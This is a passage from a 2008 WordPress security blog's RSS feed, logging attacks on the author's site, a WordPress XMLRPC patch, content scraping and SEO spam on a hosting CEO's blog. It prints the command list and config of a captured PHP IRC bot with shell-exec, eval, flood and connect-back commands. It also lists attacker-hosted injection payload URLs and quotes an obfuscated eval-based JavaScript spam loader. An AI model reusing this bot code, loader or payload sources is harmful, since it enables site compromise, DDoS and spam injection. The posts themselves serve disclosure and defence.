 * .user &lt;password&gt; //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail &lt;to&gt; &lt;from&gt; &lt;subject&gt; &lt;msg&gt; //send an email
 * .dns &lt;IP|HOST&gt; //dns lookup
 * .download &lt;URL&gt; &lt;filename&gt; //download a file
 * .exec &lt;cmd&gt; // uses exec() //execute a command
 * .sexec &lt;cmd&gt; // uses shell_exec() //execute a command
 * .cmd &lt;cmd&gt; // uses popen() //execute a command
 * .info //get system information
 * .php &lt;php code&gt; // uses eval() //execute php code
 * .tcpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;port&gt; &lt;delay&gt; //tcpflood attack
 * .udpflood &lt;target&gt; &lt;packets&gt; &lt;packetsize&gt; &lt;delay&gt; //udpflood attack
 * .raw &lt;cmd&gt; //raw IRC command
 * .rndnick //change nickname
 * .pscan &lt;host&gt; &lt;port&gt; //port scan
 * .safe // test safe_mode (dvl)
 * .inbox &lt;to&gt; // test inbox (dvl)
 * .conback &lt;ip&gt; &lt;port&gt; // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo &quot;Ok unlocker. We did i!&quot;;

class pBot
{
 var $config = array(&quot;server&quot;=&gt;&quot;Bucharest.ro.eu.ultra-chat.org&quot;,
 &quot;port&quot;=&gt;&quot;6667&quot;,
 &quot;pass&quot;=&gt;&quot;n&quot;,
 &quot;prefix&quot;=&gt;&quot;[R]&quot;,
 &quot;maxrand&quot;=&gt;&quot;4&quot;,
 &quot;chan&quot;=&gt;&quot;#unlocker&quot;,
 &quot;chan2&quot;=&gt;&quot;#unlocker&quot;,
 &quot;key&quot;=&gt;&quot;n&quot;,
 &quot;modes&quot;=&gt;&quot;+p&quot;,
 &quot;password&quot;=&gt;&quot;n&quot;,
 &quot;trigger&quot;=&gt;&quot;.&quot;,
 &quot;hostauth&quot;=&gt;&quot;Robert.users.ultra-chat.org&quot; // * for any hostname (remember: /setvhost xdevil.org)
 );
</pre>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/">Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</a></li>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Dynamic_DNS">Dynamic DNS</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attemps-on-blogkakkoinet-feb-6th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008</title>
		<link>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</link>
		<comments>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 12:13:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[script injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[botscan]]></category>

		<category><![CDATA[CMS]]></category>

		<category><![CDATA[csrf]]></category>

		<category><![CDATA[doorway]]></category>

		<category><![CDATA[fingering]]></category>

		<category><![CDATA[hack]]></category>

		<category><![CDATA[ircbot]]></category>

		<category><![CDATA[perlbot]]></category>

		<category><![CDATA[sql injection]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/</guid>
		<description><![CDATA[

 I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful &#8595;.

Failed Hacking Attempts
Sort by Injection type.



IP / DDNS
UA
ATT
Country
Params




85.25.10.30
N/A
2
Germany


http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt
Request URI: /security/injection/




]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/hacking-attempts.png' alt='hacking attempts ' width='300' height='80' class="fl" /> I received lots of multiple botnet injection (e.g: code &#038; sql) on my wordpress blog. All the failed attempts from these <a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Botnet</a> (Bot-herder) will be published in this post. Somebody might find the informations useful &darr;.<br />
<span id="more-178"></span></p>
<h2>Failed Hacking Attempts</h2>
<p>Sort by Injection type.</p>
<table class="cb" id="hack-attemp-list">
<thead>
<tr>
<th>IP / DDNS</th>
<th><acronym title="User Agent">UA</acroynm></th>
<th><acronym title="Attack">ATT</acroynm></th>
<th>Country</th>
<th>Params</th>
</tr>
</thead>
<tbody>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=85.25.10.30" class="exturl icn-r" rel="nofollow">85.25.10.30</a></small></td>
<td>N/A</td>
<td>2</td>
<td><small><a href="http://api.hostip.info/?ip=85.25.10.30" class="exturl icn-r" rel="nofollow">Germany</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt</small></li>
<li><small>Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=200.226.246.22class="exturl icn-r" rel="nofollow">200.226.246.22</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=200.226.246.22" class="exturl icn-r" rel="nofollow">Brazil</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=203.151.233.24" class="exturl icn-r" rel="nofollow">203.151.233.24</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=203.151.233.24" class="exturl icn-r" rel="nofollow">Thailand</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://safe-bx.iespana.es/test.txt</small></li>
<li><small> Request URI: <a href="/topics/security/injection/">/security/injection/</a></small></li>
</ul>
</td>
</tr>
<tr>
<td><small><a href="http://ws.arin.net/cgi-bin/whois.pl?queryinput=69.10.135.176" class="exturl icn-r" rel="nofollow">69.10.135.176</a></small></td>
<td>N/A</td>
<td>4</td>
<td><small><a href="http://api.hostip.info/?ip=69.10.135.176" class="exturl icn-r" rel="nofollow">Canada</a></small></td>
<td>
<ul class="xoxo r">
<li><small>http://chmod.altervista.org/modalita/cmd2.txt</small></li>
<li><small> Request URI: <a href="/security/vulnerability/fixes-statscounter-updatesh-vulnerability/">/fixes-statscounter-updatesh-vulnerability/</a></small></li>
</ul>
</td>
</tr>
</tbody>
</table>
<h2>Related Posts</h2>
<ul>
<li><a rev="site:related" href="/security/injection/owned-mass-remote-code-injection-as-googlebot-packet-spoofing-perl-shellbot-php-trojan/">Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot &#038; Trojan</a></li>
</ul>
<h2>External Links</h2>
<ul class="xoxo">
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Botnet">Wikipedia &rarr; Botnet</a></li>
<li><a class="exturl icn-r" href="http://en.wikipedia.org/wiki/Storm_botnet">Storm Botnet</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/daily-hacking-attempts-on-blogkakkoinet-feb-5th-2008/feed/</wfw:commentRss>
		</item>
		<item>
		<title>WordPress 2.3.3 Security Release</title>
		<link>http://42.kaizeku.com/wordpress/wordpress-233-security-release/</link>
		<comments>http://42.kaizeku.com/wordpress/wordpress-233-security-release/#comments</comments>
		<pubDate>Tue, 05 Feb 2008 06:01:34 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[patch]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/wordpress-233-securities-release/</guid>
		<description><![CDATA[

Wordpress 2.3.3 fixes a few minor bugs and the debatable Wordpress 2.3.2 XMLRPC vulnerability. It took 4 months to track the XMLRPC exploit and 1 days for the patch to be release. Kudos to WordPress Developer especially Ryan &#038; Joseph Scott for these quick security release.
Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott

xmlrpc.php.diff (0.7 kB) -on [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img class="fl" src='http://blog.kakkoi.net/wp-content/uploads/2008/02/wordpress-small.png' alt='wordpress small logo' width="33" height="33" longdesc="http://blog.kakkoi.net/wp-content/uploads/2008/02/wordpress-small.png" /><strong>Wordpress 2.3.3</strong> fixes a few <a href="http://trac.wordpress.org/query?status=closed&#038;milestone=2.3.3" class="exturl icn-r">minor bugs</a> and the debatable <a href="/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/">Wordpress 2.3.2 XMLRPC vulnerability</a>. It took 4 months to track the <em><a href="http://trac.wordpress.org/ticket/5313" class="exturl icn-r">XMLRPC exploit</a></em> and 1 days for the patch to be release. Kudos to WordPress Developer especially <span class="vcard"><a href="http://boren.nu/" class="url fn microformat icn-l">Ryan</a></span> &#038; <span class="vcard"><a href="http://joseph.randomnetworks.com/" class="url fn microformat icn-l"><span class="given-name">Joseph</span> <span class="family-name">Scott</span></a></span> for these quick security release.</p>
<h2>Wordpress 2.3.2 XMLRPC vulnerability patches by josephscott</h2>
<ul>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/xmlrpc.php.diff">xmlrpc.php.diff</a> (0.7 kB) -on 02/02/08 16:53:22.</li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/xmlrpc.php.2.diff">xmlrpc.php.2.diff</a> (3.2 kB) - on 02/03/08 04:49:26.</li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/attachment/ticket/5313/2.3-xmlrpc.php.diff">2.3-xmlrpc.php.diff</a> (3.2 kB) - on 02/04/08 18:48:23 (2.3.3).</li>
</ul>
<p><span id="more-174"></span></p>
<h2>External Links</h2>
<ul>
<li><a class="exturl icn-r" href="http://wordpress.org/download/">Wordpress 2.3.3 Download</a></li>
<li><a class="exturl icn-r" href="http://wordpress.org/development/2008/02/wordpress-233/">Wordpress Development Blog</a></li>
<li><a class="exturl icn-r" href="http://trac.wordpress.org/milestone/2.3.3">Wordpress 2.3.3 Milestone</a></li>
<li><a class="exturl icn-r" href="http://www.village-idiot.org/archives/2008/02/04/wordpress-2-3-3/">village-idiot.org &rarr; WordPress 2.3.3 List of changed files</a> <small>(download available)</small></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/wordpress-233-security-release/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Wordpress 2.3.2 XMLRPC Exploit Unofficial Patch</title>
		<link>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</link>
		<comments>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/#comments</comments>
		<pubDate>Sat, 02 Feb 2008 21:32:51 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[0-day]]></category>

		<category><![CDATA[metaWeblog]]></category>

		<category><![CDATA[patch]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/</guid>
		<description><![CDATA[This issue has been raised 4 months ago (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WP Developer decide to stop arguing on the mailing list and came out with WordPress securities fix release (maybe for v 2.3.5) You might want to try this “Temporary” workaround suggest by SecuriTeam - Paul (Yabba) Jones.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.thumbnail.jpg' alt='this is relevant to my interest lolcat' width='128' height='100' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/2000455272489756911_rs.jpg' />This issue has been raised <a href="http://wordpress.org/support/topic/134928/">4 months ago</a> (october 2007). Certainly this is one of BadPress Ticketing Problems. Until WordPress Developer release Official securities fix (v 2.3.2.1 || 2.3.5 ?? ) You might want to try this &#8220;debatable&#8221; patch by <a href="http://www.securiteam.com" class="exturl icn-r">SecuriTeam</a> - Paul (Yabba) Jones. </p>
<p class="notice cb mgt">Note: <span class="vcard"><a class="url fn microformat icn-r" href="http://ma.tt" title="Matt Mullenweg - PhotoMatt"><span class="given-name">Matt</span> <span class="family-name">Mullenweg</span></a></span> &#038; the <a href="http://lists.automattic.com/mailman/listinfo/wp-hackers">WP-Hackers</a> is against secureTeam &#8220;hasty-patch&#8221; and their <abbr title="Proof of Concept">POC</abbr> release. <small><a href="http://comox.textdrive.com/pipermail/wp-hackers/2008-February/017544" class="exturl icn-r">[wp-hackers] xmlrpc issue or no?</a></small>.</p>
<p><em>Excerpt from Wordpress Support Forum &raquo; <a href="http://wordpress.org/support/topic/134928/">iframe injection problem?</a></em></p>
<blockquote cite="http://wordpress.org/support/topic/134928/page/3#post-686803"><p class="quote"><a href="http://wordpress.org/support/topic/134928/page/3#post-686803" class="exturl icn-r">Matt Mullenweg</a> &rarr; [...] I would rather not have people think they&#8217;re safe and really not be, and there is a release coming shortly anyway. [...]<br />
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php. <small>~ Feb 3, 2008</small> </p>
</blockquote>
<p><span id="more-170"></span></p>
<p class="notice"><a href="http://blog.kakkoi.net/wordpress/wordpress-233-security-release/">WordPress 2.3.3</a> has been release it&#8217;s advice not to try this patches</p>
<h2>Patch xmlrpc.php via WordPress Admin</h2>
<ol class="xoxo">
<li> Login to Wordpress Admin</li>
<li class="cf"><a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' title='manage-files-xmlrpc.png' class="rr fr"><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.thumbnail.png' alt='manage-files-xmlrpc.png' width='128' height='64' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' /></a> Goto Manage &raquo; Files then scroll down to &#8220;Other Files&#8221; sections, type in <em>xmlrpc.php</em>. otherwise type the following URL in your browser address-bar &darr;
<pre>mydomain.com/wp-admin/templates.php?file=xmlrpc.php&#038;submit=Edit+file+%C2%BB</pre>
</li>
<li>Find the following code (around Line <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">1151</a> - 1203 ) within <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#1123" class="exturl icn-r">wp_xmlrpc_server::mw_editPost()</a> class methods &darr;
<pre>if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )</pre>
</li>
<li>Replace with
<pre class="prebox">
//if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
 if ( ( 1 || 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
</pre>
<p>saved.
</li>
<li>Disabled New User Registrations for temporary.</li>
</ol>
<h2>External Links</h2>
<ul>
<li><a href="http://wordpress.org/support/topic/134928/" class="exturl icn-r">Wordpress Support Forum &rarr; iframe injection problem?</a></li>
<li><a href="http://www.securiteam.com/unixfocus/5HP010KNFK.html#ArticleTABLE" class="exturl icn-r">SecuriTeam &rarr; WordPress 2.3.2 XMLRPC Vulnerability <abbr title="proof of concept">POC</abbr></a>
<li><a href="http://en.wikipedia.org/wiki/XML-RPC" class="exturl icn-r">Wikipedia XML-RPC</a></li>
<li><a href="http://www.google.com/search?hl=en&amp;q=Wordpress+XML-RPC+Vulnerabilities" class="exturl icn-r">Google &rarr; Wordpress XML-RPC Vulnerabilities</a></li>
<li><a class="exturl icn-r" href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">PHPXREF wp-trunk xmlrpc source</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to track Google Proxy Hack Duplicate Contents</title>
		<link>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/</link>
		<comments>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/#comments</comments>
		<pubDate>Fri, 01 Feb 2008 06:29:10 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Google Alerts]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[CopyScape]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[google alerts]]></category>

		<category><![CDATA[google-bug]]></category>

		<category><![CDATA[proxy]]></category>

		<category><![CDATA[proxy hack]]></category>

		<category><![CDATA[webscrapper]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-track-google-proxy-hack-duplicate-contents/</guid>
		<description><![CDATA[

I&#8217;m quite surprise to see my server logs todays, Some dude decide to scrap my blog content (including my wp translations cache 100mb+ ) 
The Offending uri:
http://www.shouker.com/user1/baiheinet/2008/1/16/80897.html
I&#8217;d blocked the site but it wont stop the search engine crawler from indexing the content .
This is nasty Blackhat SEO methods to get the target website penalize for [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg' alt='Marvin Apbot costume by chaoskaizer' width="100" height="100" longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg" />I&#8217;m quite surprise to see my server logs todays, Some dude decide to scrap my blog content (including my wp translations cache 100mb+ ) </p>
<pre>The Offending uri:
http://www.shouker.com/user1/baiheinet/2008/1/16/80897.html</pre>
<p>I&#8217;d blocked the site but it wont stop the search engine crawler from indexing the content .</p>
<p>This is nasty Blackhat SEO methods to get the target website penalize for duplicate content on Major Search Engine. There is few solution that i found at various resources &darr;.<br />
<span id="more-167"></span></p>
<ul>
<li>Report to Google, <dfn title="google proxy hack report">proxyreports@gmail.com</dfn> provide the url &#038; the google search query.</li>
<li>Block the Proxy Referrer IP</li>
<li>Add special no index meta for unknown search engine spiders.
<pre>&lt;META NAME=&quot;ROBOTS&quot; CONTENT=&quot;NOARCHIVE, NOINDEX, NOFOLLOW&quot;&gt;</pre>
</li>
</ul>
<h2>How to track Google Proxy Hacked Duplicate Contents</h2>
<ol>
<li>Monitor your content with <a class="exturl icn-r" href="http://www.google.com/alerts">Google Alerts</a> try used a unique <em>Search terms</em> for your website. i.e: blog.kakkoi, myname, myunique keywords, url http://blog.kakkoi.net, base64 safe uri encode.<br />
If you have a Google Webmaster Account go to <em>Statistics &raquo; What Googlebot sees</em> used the keywords as your Google Alerts search terms.
</li>
<li>Search for copies of your page on the Web <a href="http://www.copyscape.com/" class="exturl icn-r">copyscape</a></li>
</ol>
<h2>Whitelisting Search Engine Crawler</h2>
<p>IMO blocking the IP range of Proxy Server is not very practical. Having a Whitelist of Search Engine Crawler IP (class c) might do the trick. I&#8217;m working on a script for whitelisting search engine crawler for my wordpress. Hopefully i can finished it later this week. </p>
<h2>Google Algo bugs</h2>
<p><span class="vcard"><a href="http://www.seofaststart.com/" class="url fn microformat icn-l">Dan Thies</a></span> at seofaststart.com posts a details analysis regarding this issue, check out his post &rarr; <a class="exturl icn-r" href="http://www.seofaststart.com/blog/google-proxy-hacking">Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs</a>.</p>
<h2>Recent Update</h2>
<ul>
<li class="cf">Caught the proxy user just after I published this articles. Its human <em>117.8.222.77 / c-net 117.8.0.0/13</em> from Tianjin, China.<br />
<a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/shouker-proxy.png' title='shouker-proxy.png' type="image/png"><img src='/wp-content/uploads/2008/02/shouker-proxy.thumbnail.png' alt='shouker.com proxy user' width='128' height='41' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/shouker-proxy.png' /></a></li>
<li>The IP was graylisted on RBL &#038; cml.anti-spam.org.cn so we send a letter to abuse@cnc-noc.net</li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II</title>
		<link>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/#comments</comments>
		<pubDate>Thu, 31 Jan 2008 17:07:22 +0000</pubDate>
		<dc:creator>chaoskaizer.myopenid.com</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[BotNet]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[spamdexing]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[Being Hacked by SEO spammer is like a yearly events at Mattheaton.com. Bluehost CEO WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at  &#8594; Matt Heaton BlueHost HostMonster CEO Official Blog Hacked.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/wordpress-blackhat-seo-spam.png' alt='wordpress-blackhat-seo-spam.png image by chaoskaizer' width="128" height="128" longdesc="http://blog.kakkoi.net/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-jagger-goro-class-mailphp/" class="photo thumb- fl" />Being Hacked by SEO spammer is seem like a yearly events at <span class="vcard"><a href="http://mattheaton.com" class="url fn microformat icn-r1">Mattheaton.com</a></span>. Matt&#8217;s WordPress blog was first hijacked 2 months ago on 26 November 2007 (according to my record). You can digg my earlier post at &rarr; <a href="/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/">Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</a>.</p>
<p>It&#8217;s a big embarrassment for <a rel="nofollow" class="exturl icn-r1" href="http://www.bluehost.com">bluehost</a> &#038; <a rel="nofollow" href="http://www.hostmonster.com" class="exturl icn-r1">hostmonster</a> hosting to have their CEO&#8217;s blog being spamride every year (since 2007) . Drilling Matt Heaton&#8217;s with bad ads wont solves the Blackhat Spam issues, I will left that particulars part to my readers to speculate.</p>
<p><span id="more-156"></span></p>
<h2 class="cb mgt">Mattheaton Goro Spam Chronology</h2>
<table>
<thead>
<tr>
<th>Date</th>
<th>Event</th>
</tr>
</thead>
<tbody>
<tr>
<td><small>Jul 2007</small></td>
<td> Google PR 7</td>
</tr>
<tr>
<td><small>Aug 2007</small></td>
<td> Stop being Index by <a rel="nofollow" class="exturl icn-r1" href="http://web.archive.org/web/*/http://www.mattheaton.com">archive.org</a></td>
</tr>
<tr>
<td><small>Nov 28th 2007</small></td>
<td> <strong class="fw-">Wordpress.net.in</strong> Goro Spam on wp_footer backlink to <a class="exturl icn-r1" href="http://www.howardowens.com/">howardowens.com</a></td>
</tr>
<tr>
<td><small>Dec 4th 2007</small></td>
<td>Unknown Goro Spam on wp_head backlink to <a href="http://tangonoticias.com/" class="exturl icn-r1">tangonoticias.com</a></td>
</tr>
<tr>
<td><small>Dec 11th 2007</small></td>
<td>Wordpress Upgrade to version 2.3.1</td>
</tr>
<tr>
<td><small>Jan 16th, 2008</small></td>
<td>Google PR5</td>
</tr>
<tr>
<td><small>Jan 26th, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.brainware-india.com/" rel="nofollow" class="exturl icn-r1">brainwave-india.com</a></td>
</tr>
<tr>
<td><small>Feb 3rd, 2008</small></td>
<td>Unknown Blackhat SEO spam on wp_head backlink to <a href="http://www.thinkingphp.org/" rel="nofollow" class="exturl icn-r1">thinkingphp.org</a></td>
</tr>
<tr>
<td><small>Feb 8th, 2008</small></td>
<td>Unknown uusing CSS cloacking method on wp_head backlink to <a href="http://www.zoorender.com/" rel="nofollow" class="exturl icn-r1">zoorender.com</a></td>
</tr>
<tr>
<td><small>Feb 13th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://blog.jensfranke.com/" class="exturl icn-r1">blog.jensfranke.com</a></td>
</tr>
<tr>
<td><small>Feb 20th, 2008</small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.entrepreneur27.org/" class="exturl icn-r1">entrepreneur27.org</a></td>
</tr>
<tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022408.txt' title='mattheaton-com-022408.txt'>Feb 24th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.latenightpc.com/" class="exturl icn-r1" title="www.latenightpc.com">latenightpc.com</a></td>
</tr>
<td><small><a type="text/plain" href='/wp-content/uploads/2008/02/mattheaton-com-022608.txt' title='mattheaton-com-022608.txt'>Feb 26th, 2008</a></small></td>
<td>Unknown using CSS cloacking method on wp_head backlink to <a href="http://www.communitynext.com" class="exturl icn-r1" title="www.communitynext.com">communitynext.com</a></td>
</tr>
</tbody>
</table>
<h2 class="cb mgt mgb-">Wordpress.net.in GORO Spam Pattern</h2>
<ul class="xoxo exturl pdt">
<li>All the infected sites will stop being index by archive.org few months before the spam started.</li>
<li>From Nov 2007 to Jan 2008 (Right after Google Mass <abbr title="pay-per---post"> P3</abbr> De-rank fever) - The Blackhat Goro Spammer is targeting PR6 &#038; PR7 sites running on WordPress (2.3.1 below) and on some rare case (tangonoticias.com) Joomla CMS (1.0.x)</li>
<li>I categorize this blackhat method as <a href="http://en.wikipedia.org/wiki/Sybil_attack">Sybil Attack</a><br />
<blockquote cite="http://en.wikipedia.org/wiki/Reputation_system"><p class="quote">A Sybil attack is one in which an attacker subverts the reputation system by creating a large number of pseudonymous entities, and using them to gain a disproportionately large influence. A reputation system&#8217;s vulnerability to a Sybil attack depends on how cheaply Sybils can be generated, the degree to which the reputation system accepts input from entities that do not have a chain of trust linking them to a trusted entity, and whether the reputation system treats all entities identically.</p>
</blockquote>
<p>- Derank and manipulate their victim host to boost their pharmaceutical products on Google Local Search Index (gaming Localrank for better SERP) </li>
<li>Goro signatures:
<ol>
<li>html div with id &#8220;goro&#8221;
<pre class="smallbox">&lt;div id=&quot;goro&quot;&gt; &lt;a href=&quot;&gt;...&lt;/a&gt; &lt;/div&gt;
</pre>
</li>
<li>javascript function name &#8220;getme()&#8221;
<pre class="smallbox">&lt;script type=&quot;text/javascript&quot;&gt;function getme(str){ var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ''; var i = 1; for (++idx; idx &lt; len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str); }getme('http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E4D545652090A0E5252564840083D414A4641354C0FF83E3E3C32F306'); &lt;/script&gt;
</pre>
</li>
<li>Output spam on WordPress wp_footer &#038; wp_head hook</li>
</ol>
</ul>
<h2>Blackhat SEO Spamdexing Google Local Search Index</h2>
<p>The below graph explain the Blackhat SEO Spamdexing methods for Manipulating Google Local SERP.</p>
<h3 class="title-">View Spamdexing Google Local Search Image</h3>
<div id="spamdexing-google-local-search" class="dn">
<img src='/wp-content/uploads/2008/01/mattheaton-comeback.png' alt='spamdexing-google-localsearch.png' class="mgb ta-c" width="500" height="800" /></p>
<p class="notice cb mgt">Note: A blackhat at hoqwarts ;)</p>
</div>
<h2 class="cb mgb-">ScreenGrab</h2>
<ul class="xoxo pdt exturl">
